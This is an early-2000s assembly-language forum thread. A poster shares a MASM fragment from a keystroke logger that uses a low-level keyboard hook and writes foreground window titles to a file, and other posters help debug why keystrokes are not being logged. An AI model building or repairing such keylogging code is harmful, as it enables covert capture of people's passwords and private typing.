.ELSE
mov hWndFG, eax
invoke GetWindowText, hWndFG, addr AppName, 1024
invoke WriteFile, fWnd, addr AppName, eax, addr bytesWritten, NULL
invoke WriteFile, fWnd, addr CRLF, 2, addr bytesWritten, NULL
; invoke PostMessage, hWnd, WM_KEYHOOK, wParam, lParam
.ENDIF
.ELSE

Here is a snippet of my code. If the hWnd changes from keystroke to keystroke, the Application name will be in the file, otherwise a keystroke will be logged. I think the code speaks for itself.

This P.O.S code complies fine, but when I go to run it, it doesn't work correctly. ONLY the appname is logged, in place of keystrokes. I had to comment out the postmessage line to stop the prog from writing the appname over and over! I'm not changing the active window when I run the program. Is my logic wrong? Is the window handle constantly changing?

Please help..... in desprate need.....

thanks in advance........
lackluster
Posted on 2001-10-16 22:27:19 by lackluster
Afternoon, Lackluster.

I dunno if this'll help, however it's worth a try.

It could be that the *.if....else* macro is mucking around with eax (This is a total guess - I really wouldn't have a clue ;) ).
Try adding another *invoke GetForegroundWindow* straight after the *.ELSE* and see if it works.

Cheers,
Scronty
Posted on 2001-10-17 02:30:31 by Scronty
lackluster, forgive me if my question is stupid but is your hWndFG a "global" variable?
Posted on 2001-10-17 02:48:18 by japheth
What is WM_KEYHOOK
and why do you think that lParam should have address of
the byte made by keystruck?
Posted on 2001-10-17 04:19:07 by The Svin
My best guess would be how have you declared 'hWndFG'.

Same as what japheth was saying, if you have made hWndFG a LOCAL varible on the stack, its value is highly likly to change each time the WM_KEYHOOK message is recieved.
Posted on 2001-10-17 05:18:15 by huh
The variable is global defined in the .data section as:
hWndFG dd 0

WM_KEYHOOK is defined under .const as:
WM_KEYHOOK equ WM_USER + 6

It does return a keystroke. I'm using WH_KEYBOARD_LL hook type and passing the time stamp in wParam, and the char (after converting the VK) in lParam.

I haven't yet been home to check Scronty's (great sig by the way ;)) suggestion.
Posted on 2001-10-17 10:17:49 by lackluster
NOpe, that didn't work either. I changed the .IF .ELSE to cmp jne. I think I've tried everything. I'm going to go cry like a schoolgirl now...
Posted on 2001-10-17 19:46:04 by lackluster
lackluster,

use OutputDebugString to display the hWnd and other interesting stuff. Since the low level keyboard hook is a bit time critical, I suggest to deactivate the writing to files in the first step.

To show the output of OutputdebugString in Windows NT/2000, there is freeware available.

japheth
Posted on 2001-10-18 03:38:17 by japheth
Japeth,
Actually that's the reason for my most recent post (Int-->String). I was going to display the hWnd in the messageboxes. Would there be an advantage to using the OutputDebugString instead?
Posted on 2001-10-18 08:30:10 by lackluster